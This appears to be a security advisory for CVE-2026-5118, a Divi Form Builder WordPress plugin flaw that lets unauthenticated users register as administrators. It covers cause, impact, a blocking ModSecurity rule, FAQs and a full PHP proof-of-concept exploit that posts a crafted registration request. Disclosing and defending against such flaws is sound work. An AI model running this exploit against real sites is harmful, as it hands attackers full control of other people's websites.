What is CVE-2026-5118?

CVE-2026-5118 is a critical unauthenticated privilege escalation vulnerability in the Divi Form Builder plugin for WordPress, affecting versions up to and including 5.1.2. It allows unauthenticated attackers to create administrator accounts by manipulating a user-controlled ‘role’ parameter during user registration.

How does the vulnerability work?

The vulnerability arises because the Divi Form Builder does not validate the ‘role’ parameter from POST data against the configured default user role. An attacker can send a crafted registration request with the ‘role’ set to ‘administrator’, leading to the creation of an admin account without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Divi Form Builder plugin version 5.1.2 or earlier is affected. Administrators should check their plugin version and update to the patched version to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Divi Form Builder plugin and verify if the version is 5.1.2 or earlier.

What should I do to fix this vulnerability?

The recommended fix is to update the Divi Form Builder plugin to version 5.1.3 or later, which addresses the vulnerability. Additionally, ensure that server-side validation of user roles is implemented to prevent similar issues.

What does a CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a significant risk to the affected system. This level suggests that exploitation is easy and could lead to complete system compromise.

What practical risks does this vulnerability pose?

If exploited, an attacker can gain full control over the WordPress installation, allowing them to upload malicious files, modify content, and access sensitive data. This level of access can lead to severe consequences, including data breaches and service disruption.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can send a POST request to the plugin’s AJAX handler with a crafted payload that includes the ‘role’ parameter set to ‘administrator’. This demonstrates the ease of exploiting the vulnerability to create an admin account.

What is the role of server-side validation in preventing this issue?

Server-side validation is crucial as it ensures that user inputs are checked against expected values before being processed. In this case, the plugin should enforce the default user role configured in its settings, preventing unauthorized role assignments.

Can automated scripts exploit this vulnerability?

Yes, the vulnerability can be exploited using automated scripts, making it a target for widespread attacks. The simplicity of the exploit allows attackers to easily create multiple admin accounts without any authentication.

What are the long-term implications of a successful exploit?

If an attacker successfully exploits this vulnerability, they can maintain persistent access to the site, potentially leading to ongoing security issues. This could result in the site being used for malicious purposes, such as phishing or distributing malware.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-5118: Divi Form Builder <= 5.1.2 – Unauthenticated Privilege Escalation via 'role' (divi-form-builder)

CVE ID CVE-2026-5118

Plugin divi-form-builder

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 5.1.2

Patched Version —

Disclosed May 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5118 (metadata-based): The Divi Form Builder plugin for WordPress, versions 5.1.2 and earlier, contains an unauthenticated privilege escalation vulnerability. Attackers can create administrator accounts by sending a crafted registration request, achieving full site compromise with a CVSS score of 9.8.

The root cause is improper privilege management (CWE-269) during user registration. The plugin accepts a user-controlled ‘role’ parameter from POST data without validating it against the form’s configured ‘default_user_role’ setting. This is a classic missing server-side validation flaw. Atomic Edge analysis infers that the registration handler retrieves the role directly from $_POST[‘role’] and passes it to wp_insert_user() or similar WordPress function without checking whether the submitted role matches the intended default. The patched version (5.1.3) likely adds a whitelist check or forces the role to the configured default.

Exploitation is straightforward. An unauthenticated attacker sends a POST request to the plugin’s AJAX handler (likely /wp-admin/admin-ajax.php with action set to something like ‘divi_form_builder_submit’ or ‘divi_register_user’). The payload includes standard registration fields (username, email, password) plus a ‘role’ parameter set to ‘administrator’. The plugin processes the request and creates a new user with administrator privileges. No authentication or nonce is required. Attackers can chain this with automated scripts to create multiple admin accounts.

Remediation requires server-side validation of the user role. The plugin should never accept the role from user input. Instead, it must enforce the role defined in the form’s settings. Atomic Edge analysis recommends the fix: remove the role parameter from user-controlled input entirely and use the pre-configured default role stored in the database. If dynamic roles are necessary, implement a strict whitelist of allowed roles and verify the submitted role against that whitelist, with administrator privileges never exposed to user selection.

Impact is catastrophic. Unauthenticated attackers can become site administrators, granting full control over the WordPress installation. This includes the ability to upload malicious files, modify themes and plugins, create content, access the database, and potentially execute arbitrary code. Since the attack requires no authentication and the exploit is trivial, widespread automated exploitation is likely. Sites running the vulnerable plugin version should be considered compromised and undergo immediate remediation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5118 (metadata-based)
# Blocks unauthenticated privilege escalation via role parameter in Divi Form Builder AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20265118,phase:2,deny,status:403,chain,msg:'CVE-2026-5118 Divi Form Builder Privilege Escalation',severity:'CRITICAL',tag:'CVE-2026-5118'"
  SecRule ARGS_POST:action "@rx ^divi_form_builder_" "chain"
    SecRule ARGS_POST:role "@streq administrator" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5118 - Divi Form Builder <= 5.1.2 - Unauthenticated Privilege Escalation via 'role'

// Target WordPress site URL (change this)
$target_url = 'http://example.com';

// AJAX action hook (inferred from plugin slug; adjust if needed)
$ajax_action = 'divi_form_builder_form_submit';

// Registration payload - role parameter triggers escalation
$post_data = array(
    'action'            => $ajax_action,
    'form_id'           => 1,  // Assuming form ID 1 exists; may need enumeration
    'username'          => 'attacker_admin_' . time(),
    'email'             => 'attacker_' . time() . '@example.com',
    'password'          => 'ExploitPass123!',
    'role'              => 'administrator',  // Unvalidated privilege escalation
    'confirm_password'  => 'ExploitPass123!',
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: $http_coden";
if ($response) {
    echo "[+] Response Body: $responsen";
    $decoded = json_decode($response, true);
    if (isset($decoded['success']) && $decoded['success'] === true) {
        echo "[!] Exploit likely successful. Check for new admin user.n";
    } else {
        echo "[-] Exploit may have failed. Verify target and form_id.n";
    }
} else {
    echo "[-] No response received.n";
}
?>

Frequently Asked Questions

What is CVE-2026-5118?
Understanding the vulnerability
CVE-2026-5118 is a critical unauthenticated privilege escalation vulnerability in the Divi Form Builder plugin for WordPress, affecting versions up to and including 5.1.2. It allows unauthenticated attackers to create administrator accounts by manipulating a user-controlled ‘role’ parameter during user registration.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the Divi Form Builder does not validate the ‘role’ parameter from POST data against the configured default user role. An attacker can send a crafted registration request with the ‘role’ set to ‘administrator’, leading to the creation of an admin account without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Divi Form Builder plugin version 5.1.2 or earlier is affected. Administrators should check their plugin version and update to the patched version to mitigate the risk.
How can I check if my site is vulnerable?
Verifying your plugin version
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Divi Form Builder plugin and verify if the version is 5.1.2 or earlier.
What should I do to fix this vulnerability?
Recommended remediation steps
The recommended fix is to update the Divi Form Builder plugin to version 5.1.3 or later, which addresses the vulnerability. Additionally, ensure that server-side validation of user roles is implemented to prevent similar issues.
What does a CVSS score of 9.8 mean?
Understanding severity levels
A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a significant risk to the affected system. This level suggests that exploitation is easy and could lead to complete system compromise.
What practical risks does this vulnerability pose?
Potential impact on your site
If exploited, an attacker can gain full control over the WordPress installation, allowing them to upload malicious files, modify content, and access sensitive data. This level of access can lead to severe consequences, including data breaches and service disruption.
How does the proof of concept demonstrate the issue?
Explaining the provided exploit
The proof of concept illustrates how an attacker can send a POST request to the plugin’s AJAX handler with a crafted payload that includes the ‘role’ parameter set to ‘administrator’. This demonstrates the ease of exploiting the vulnerability to create an admin account.
What is the role of server-side validation in preventing this issue?
Importance of validation mechanisms
Server-side validation is crucial as it ensures that user inputs are checked against expected values before being processed. In this case, the plugin should enforce the default user role configured in its settings, preventing unauthorized role assignments.
Can automated scripts exploit this vulnerability?
Risk of widespread attacks
Yes, the vulnerability can be exploited using automated scripts, making it a target for widespread attacks. The simplicity of the exploit allows attackers to easily create multiple admin accounts without any authentication.
What are the long-term implications of a successful exploit?
Consequences of site compromise
If an attacker successfully exploits this vulnerability, they can maintain persistent access to the site, potentially leading to ongoing security issues. This could result in the site being used for malicious purposes, such as phishing or distributing malware.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations